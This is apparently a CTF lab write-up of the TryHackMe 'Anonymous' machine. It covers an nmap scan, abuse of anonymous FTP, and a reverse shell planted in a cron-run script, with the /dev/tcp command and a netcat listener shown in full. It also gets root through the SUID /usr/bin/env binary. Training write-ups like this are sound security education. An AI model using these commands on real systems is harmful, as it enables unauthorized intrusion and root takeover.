Home TryHackMe - Anonymous
Post
Cancel

TryHackMe - Anonymous

This is a medium Linux box on TryHackMe.

Try to get the two flags! Root the machine and prove your understanding of the fundamentals! This is a virtual machine meant for beginners.

Acquiring both flags will require some basic knowledge of Linux and privilege escalation methods.

Reconnaissance

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
$ nmap -sC -sV  -A  -Pn -p- -oN nmap_result 10.10.130.199
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-07 15:33 CEST
Nmap scan report for 10.10.130.199
Host is up (0.036s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx    2 111      113          4096 Jun 04  2020 scripts [NSE: writeable]
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.18.11.118
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8bca21621c2b23fa6bc61fa813fe1c68 (RSA)
|   256 9589a412e2e6ab905d4519ff415f74ce (ECDSA)
|_  256 e12a96a4ea8f688fcc74b8f0287270cd (ED25519)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: ANONYMOUS; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1s, deviation: 1s, median: 1s
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2023-04-07T13:34:19
|_  start_date: N/A
|_nbstat: NetBIOS name: ANONYMOUS, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: anonymous
|   NetBIOS computer name: ANONYMOUS\x00
|   Domain name: \x00
|   FQDN: anonymous
|_  System time: 2023-04-07T13:34:19+00:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 65.26 seconds

We notice a few ports are open, but most importantly is that FPT allows anonymous logins.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
ftp 10.10.130.199
Connected to 10.10.130.199.
220 NamelessOne's FTP Server!
Name (10.10.130.199:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
drwxrwxrwx    2 111      113          4096 Jun 04  2020 scripts
ftp> cd scripts
250 Directory successfully changed.
ftp> dir
-rwxr-xrwx    1 1000     1000          314 Jun 04  2020 clean.sh
-rw-rw-r--    1 1000     1000         1161 Apr 07 13:39 removed_files.log
-rw-r--r--    1 1000     1000           68 May 12  2020 to_do.txt
ftp> get to_do.txt
local: to_do.txt remote: to_do.txt
ftp> get removed_files.log
local: removed_files.log remote: removed_files.log
ftp> get clean.sh
local: clean.sh remote: clean.sh
ftp> exit
221 Goodbye.

$ cat to_do.txt  
I really need to disable the anonymous login...its really not safe
$ cat removed_files.log 
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete     
$ cat clean.sh         
#!/bin/bash

tmp_files=0
echo $tmp_files
if [ $tmp_files=0 ]
then
        echo "Running cleanup script:  nothing to delete" >> /var/ftp/scripts/removed_files.log
else
    for LINE in $tmp_files; do
        rm -rf /tmp/$LINE && echo "$(date) | Removed file /tmp/$LINE" >> /var/ftp/scripts/removed_files.log;done
fi

Nothing special here, we can however, mount this share and overwrite the clean.sh file as it seems to be triggered by a cronjob.

Check out SMB share

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ smbclient -L 10.10.130.199               
Password for [WORKGROUP\kali]:

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        pics            Disk      My SMB Share Directory for Pics
        IPC$            IPC       IPC Service (anonymous server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            ANONYMOUS

Nothing special found here.

Foothold

We will mount the drive with curlftpfs and try to overwrite clean.sh to spawn a reverse shell.

Mount the drive

1
2
3
4
$ sudo apt install curlftpfs
$ sudo curlftpfs anonymous:anonymous@10.10.130.199 /mnt/my_ftp/ 
$ sudo ls /mnt/my_ftp
scripts

The drive is mounted now we can edit the clean.sh script and add the command sh -i >& /dev/tcp/10.18.11.118/1234 0>&1 to spawn a reverse shell. We will also spawn a netcat listener (nc -lvnp 1234) in a separate window.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
$ sudo vi /mnt/my_ftp/scripts/clean.sh
#!/bin/bash

sh -i >& /dev/tcp/10.18.11.118/1234 0>&1

tmp_files=0
echo $tmp_files
if [ $tmp_files=0 ]
then
        echo "Running cleanup script:  nothing to delete" >> /var/ftp/scripts/removed_files.log
else
    for LINE in $tmp_files; do
        rm -rf /tmp/$LINE && echo "$(date) | Removed file /tmp/$LINE" >> /var/ftp/scripts/removed_files.log;done
fi

Privilege Escalation

We got access to the shell, through enumeration we check all binaries that had the SUID bit set through find / -type f -perm -u=s -ls 2>/dev/null and noticed that /usr/bin/env is in this list. According to GTFObins:

If the binary has the SUID bit set, it does not drop the elevated privileges and may be abused to access the file system, escalate or maintain privileged access as a SUID backdoor.

We can get a root shell through running the command /usr/bin/env /bin/sh -p

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
$ nc -lvnp 1234                                 
listening on [any] 1234 ...
connect to [10.18.11.118] from (UNKNOWN) [10.10.130.199] 57340
$ whoami
namelessone
$ ls
pics
user.txt
$ cat user.txt
**REDACTED**
$ sudo -l
sudo: no tty present and no askpass program specified
$ find / -type f -perm -u=s -ls 2>/dev/null
   131150     28 -rwsr-xr-x   1 root     root               26696 Mar  5  2020 /bin/umount
   131140     32 -rwsr-xr-x   1 root     root               30800 Aug 11  2016 /bin/fusermount
   131191     64 -rwsr-xr-x   1 root     root               64424 Jun 28  2019 /bin/ping
   131084     44 -rwsr-xr-x   1 root     root               43088 Mar  5  2020 /bin/mount
   131207     44 -rwsr-xr-x   1 root     root               44664 Mar 22  2019 /bin/su
   919497     12 -rwsr-xr-x   1 root     root               10232 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
   919679    428 -rwsr-xr-x   1 root     root              436552 Mar  4  2019 /usr/lib/openssh/ssh-keysign
   919144     60 -rwsr-xr-x   1 root     root               59640 Mar 22  2019 /usr/bin/passwd
   918992     36 -rwsr-xr-x   1 root     root               35000 Jan 18  2018 /usr/bin/env
   919017     76 -rwsr-xr-x   1 root     root               75824 Mar 22  2019 /usr/bin/gpasswd
   919128     40 -rwsr-xr-x   1 root     root               37136 Mar 22  2019 /usr/bin/newuidmap
   919127     40 -rwsr-xr-x   1 root     root               40344 Mar 22  2019 /usr/bin/newgrp
   918924     44 -rwsr-xr-x   1 root     root               44528 Mar 22  2019 /usr/bin/chsh
   919126     40 -rwsr-xr-x   1 root     root               37136 Mar 22  2019 /usr/bin/newgidmap
   918922     76 -rwsr-xr-x   1 root     root               76496 Mar 22  2019 /usr/bin/chfn
   919269    148 -rwsr-xr-x   1 root     root              149080 Jan 31  2020 /usr/bin/sudo
   919305     20 -rwsr-xr-x   1 root     root               18448 Jun 28  2019 /usr/bin/traceroute6.iputils
   918871     52 -rwsr-sr-x   1 daemon   daemon             51464 Feb 20  2018 /usr/bin/at
   919164     24 -rwsr-xr-x   1 root     root               22520 Mar 27  2019 /usr/bin/pkexec
$ /usr/bin/env /bin/sh -p
ls
pics
user.txt
$ whoami
root
$ cat /root/root.txt
**REDACTED**
This post is licensed under CC BY 4.0 by the author.